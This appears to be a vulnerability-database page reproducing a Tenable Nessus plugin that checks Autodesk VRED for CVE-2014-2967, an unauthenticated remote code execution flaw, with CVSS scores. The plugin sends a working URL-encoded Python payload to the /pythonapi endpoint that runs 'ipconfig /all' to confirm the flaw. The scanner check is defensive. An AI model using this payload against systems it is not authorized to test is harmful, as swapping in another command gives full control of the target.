Lucene search

K
nessusThis script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.AUTODESK_VRED_CVE-2014-2967.NASL
HistoryJul 24, 2014 - 12:00 a.m.

Autodesk VRED Python API Remote Code Execution

2014-07-2400:00:00
This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
128

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS

0.008

Percentile

82.1%

The remote host has a version of Autodesk VRED that is vulnerable to an unauthenticated remote code execution via a Python API exposed by its built-in web server. This can allow a remote attacker to execute arbitrary code on the host.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(76775);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2014-2967");
  script_bugtraq_id(68364);
  script_xref(name:"CERT", value:"402020");

  script_name(english:"Autodesk VRED Python API Remote Code Execution");
  script_summary(english:"Attempts remote code execution via Python API.");

  script_set_attribute(attribute:"synopsis", value:
"An application on the remote host is affected by a remote code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host has a version of Autodesk VRED that is vulnerable to
an unauthenticated remote code execution via a Python API exposed by
its built-in web server. This can allow a remote attacker to execute
arbitrary code on the host.");
  script_set_attribute(attribute:"see_also", value:"https://www.autodesk.com/products/vred/overview");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Autodesk VRED 2014 SR1 SP8 or higher.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/26");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/06/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/07/24");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:autodesk:vred");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 8888);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

appname = "Autodesk VRED";

port = get_http_port(default:8888);

# initial quick banner check
banner = get_http_banner(port:port, exit_on_fail:TRUE);
if ("Server: VREDMicroWebInterface" >!< banner) audit(AUDIT_WRONG_WEB_SERVER, port, "VREDMicroWebInterface (Autodesk VRED)");

# now we attempt rce
base_url = build_url(port:port, qs:"");

# import os
# print os.popen('ipconfig /all').read()
rce_url = "pythonapi?value=import+os%0D%0Aprint+os.popen%28%27ipconfig+%2Fall%27%29.read%28%29";

res = http_send_recv3(
  method: "GET",
  item: "/" + rce_url,
  port: port,
  exit_on_fail: TRUE
);
html = res[2];

if ("Windows IP Configuration" >!< html) audit(AUDIT_WEB_APP_NOT_AFFECTED, "Autodesk VRED Web Server", base_url);

output = strstr(html, "Windows IP Configuration");
if ("</font>" >< output) output = substr(output, 0, stridx(output, "</font>")-1);

if (report_verbosity > 0)
{
  report +=
    '\n' + 'Nessus was able to verify the vulnerability exists using the following request :' +
    '\n' +
    '\n' + base_url + rce_url +
    '\n';
  if (report_verbosity > 1)
  {
    snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
    report +=
      '\n' + "Nessus was able to execute the command 'ipconfig /all', which produced" +
      '\n' + 'the following output :' +
      '\n' +
      '\n' + snip +
      '\n' + chomp(output) +
      '\n' + snip +
      '\n';
  }
  security_hole(port:port, extra:report);
}
else security_hole(port);

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS

0.008

Percentile

82.1%

Related for AUTODESK_VRED_CVE-2014-2967.NASL